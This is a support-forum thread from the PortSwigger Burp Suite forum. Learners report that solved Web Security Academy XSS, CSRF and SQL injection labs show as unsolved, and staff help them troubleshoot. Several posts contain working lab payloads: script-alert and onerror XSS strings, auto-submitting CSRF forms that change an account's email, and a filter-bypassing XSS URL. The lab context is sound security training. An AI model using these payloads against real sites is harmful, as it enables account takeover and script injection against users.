The Burp Suite User Forum was discontinued on the 1st November 2024.


solved lab show not solved

abhineet | Last updated: Mar 28, 2022 08:29AM UTC

Hi, I have solved XSS to CSRF to change email, but it does not show as solved after solving the lab.

Ben, PortSwigger Agent | Last updated: Mar 28, 2022 08:34AM UTC

Hi, Are you able to provide us with some screenshots and details of what steps you have taken to solve the lab so that we can take a look at this for you? You can send us an email at support@portswigger.net and include the details there.

Cipher | Last updated: Sep 09, 2022 06:34PM UTC

Same problem is arising in my case (Stored XSS into HTML context with nothing encoded) in this lab. Please look into it.

Michelle, PortSwigger Agent | Last updated: Sep 12, 2022 08:00AM UTC

Thanks for your message. If you check your account now, that lab should be showing as solved.

Puneet | Last updated: Dec 08, 2022 10:21AM UTC

The same problem is arising in my situation also, where I solved SQL injection labs but it keeps showing not solved.

Michelle, PortSwigger Agent | Last updated: Dec 08, 2022 03:03PM UTC

Thanks for getting in touch. The original issue reported on this thread was resolved. We've just run some checks, and when we solve labs in the SQL injection section, these are being updated and showing as solved on the list of All Labs. If you're still having issues, can you send some screenshots of the labs you are working on and what you're seeing in your PortSwigger account to support@portswigger.net, please?

Max | Last updated: Mar 08, 2023 02:05AM UTC

Hello, I am also getting the same issue for CSRF Lab-1. Solved the task using VSCode hosted to localhost, it was able to change the E-Mail but the Lab shows it is not solved. I also used the code from hint section. It does the same, shows lab not solved. Here is my code, Thanks:

    <html>
      <body>
        <h1>Random Text</h1>
        <!-- iframe is used and is set to invisible so that the user is not able to view the attack took place. -->
        <!-- <iframe style="display:none" name="csrf-iframe"></iframe> -->
        <!-- URL: https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account -->
        <!-- This is the Host field: 0ad70033045b7e08c80be806003b000d.web-security-academy.net -->
        <!-- This is the Post field: /my-account/change-email -->
        <!-- "Action" is where the data is sent, "target" is which window (or tab, frame, iframe) to use for the request. -->
        <form action="https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account/change-email" method="POST" id="csrf-form" target="csrf-iframe">
          <input type="hidden" name="email" value="rajhlinux_2@yahoo.com">
        </form>
        <script>
          document.forms[0].submit();
        </script>
        <!--
        <form method="POST" action="https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account/change-email">
          <input type="hidden" name="email" value="a@aaa.com">
        </form>
        <script>
          document.forms[0].submit();
        </script>
        -->
      </body>
    </html>

Max | Last updated: Mar 08, 2023 02:14AM UTC

Alright, I seem to have solved the lab by sending the body to PortSwigger's "exploit server page".

Hariharan | Last updated: Aug 13, 2023 08:36AM UTC

<img src='' onerror='alert(Hi)'>

Vansh | Last updated: Aug 26, 2024 07:03AM UTC

Hello, I am also getting the lab not solved even after successfully completing the task on the "DOM XSS in document.write sink using source location.search" lab. I used the payload: Dom" onload="alert(1)

Ben, PortSwigger Agent | Last updated: Aug 26, 2024 07:10AM UTC

Hi Vansh, Have you tried using the payload in the written solution for this particular lab?

Vansh | Last updated: Aug 26, 2024 09:12AM UTC

Yes, I have tried that too.

Ben, PortSwigger Agent | Last updated: Aug 26, 2024 10:40AM UTC

Hi Vansh, I ran through that particular lab earlier today and was able to solve it using the solution provided - are you able to provide us with some screenshots to show exactly what payload you are using? In addition, what browser are you using when you attempt this lab?

Mohammed | Last updated: Aug 29, 2024 10:16AM UTC

I am also facing the same problem for the XSS lab. For example, in the "Reflected XSS into HTML context with nothing encoded" lab I used the script <script>alert(1)</script) and it is showing the pop-up. After that, I again rewrote this script in the URL and it is still showing the pop-up. But the lab's "not solved" status is not changing.

Michelle, PortSwigger Agent | Last updated: Aug 30, 2024 08:24AM UTC

I've just checked this lab and if I enter <script>alert(1)</script> in the 'Search the blog...' box I see the pop-up and the lab shows as solved. Could you give this another try and let us know if you're still seeing issues?

Mohammed | Last updated: Sep 01, 2024 11:09AM UTC

CSRF where token validation depends on request method. I solved this lab as per the instruction and the mail got changed. But it is not showing the congratulations. Later on I even followed the tutorial and followed the same procedure; still it's not showing the congratulations pop-up. Faced the same problem for Lab: CSRF where token validation depends on token being present.

Michelle, PortSwigger Agent | Last updated: Sep 02, 2024 08:12AM UTC

Hi, I wasn't seeing the same issue when I tested the lab. Could you please email support@portswigger.net with some screenshots or a screen recording of the steps you're taking so I can try and spot what I have done differently?

Arshia | Last updated: Sep 13, 2024 09:02PM UTC

Hi, I have the same problem with the "Stored XSS into HTML context with nothing encoded" lab. I tried:

    <script>alert(1)</script>
    <script> alert(1) </script>
    <script>alert()</script>
    <script>alert("Hi")</script>

Ben, PortSwigger Agent | Last updated: Sep 17, 2024 07:33AM UTC

Hi Arshia, Using <script>alert(1)</script> (as suggested in the written solution) allows me to solve this particular lab. Are you still having issues with this lab as of right now?

myouboku | Last updated: Oct 01, 2024 09:38AM UTC

Hello, I am also getting the same issue for CSRF Lab-1. It was able to change the E-Mail but the Lab shows it is not solved. Code:

    <html>
      <body>
        <form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
          <input type="hidden" name="$param1name" value="$param1value">
        </form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 08:42AM UTC

Hi, I have just run through this lab and been able to solve it using the following exploit:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="https://0a40000203d7ce5080a5df1a00ee0030.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="test3&#64;hotmail&#46;com" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>

Are you still having issues with the lab as of right now?

Mohammed | Last updated: Oct 02, 2024 12:08PM UTC

Same problem with me, solved the lab, but not showing on the lab

xeantaur | Last updated: Oct 02, 2024 12:08PM UTC

Hello, I am experiencing the same problem in CSRF 2nd lab. This is the exploit I wrote:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="https://0a88006a03e63d0280b8671300250041.web-security-academy.net/my-account/change-email">
          <input type="hidden" name="email" value="testt&#64;gmail&#46;com" />
          <input type="hidden" name="csrf" value="12345" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>

Ben, PortSwigger Agent | Last updated: Oct 03, 2024 10:13AM UTC

Hi, If you check the Access log are you seeing that the victim is visiting the page when you deliver the exploit (there should be a different IP address listed in the log)?

Gahfy | Last updated: Oct 17, 2024 03:57PM UTC

Hello, I'm facing the same issue for both "Stored XSS into HTML context with nothing encoded" and "Reflected XSS into HTML context with nothing encoded". I both tried some custom alerts (<script>alert('Hello World!');</script>) then read the solution as it seemed to be solved for me. Then I tried with <script>alert(1)</script> (using 1 and no semicolon) but this still seems to be unsolved for both.

Ben, PortSwigger Agent | Last updated: Oct 17, 2024 04:36PM UTC

Hi Gahfy, I have just tried both of these labs and was able to solve both using the solutions provided whilst using a Firefox browser. For completeness, for the "Stored XSS into HTML context with nothing encoded" lab I entered the payload <script>alert(1)</script> in the 'Comment' box when submitting a post. For the "Reflected XSS into HTML context with nothing encoded" lab, I entered the payload <script>alert(1)</script> into the search box.

Gahfy | Last updated: Oct 17, 2024 05:02PM UTC

For both of them, it didn't solve the challenge (using Firefox on macOS). Also, a link to the following will solve the challenge "Reflected XSS into HTML context with most tags and attributes blocked", by opening a print box, but the problem will not consider itself as solved.

    https://[currentEnvironmentId].web-security-academy.net/?search=<xss+onscrollend%3D"print()%3B"+style%3D"display%3Ablock%3Bheight%3A100px%3Bwidth%3A200px%3Boverflow%3Aauto">HelloToi+aussi+parfois+tu+ne+sens+pas+la+foudre+venir+parfois+et+si+seulement<h2+id%3Dx>Bonjour<%2Fh2><%2Fxss>#x

I have also tried all those with Chrome, so may it be due to macOS? Any known issue with it?

Ben, PortSwigger Agent | Last updated: Oct 18, 2024 04:37AM UTC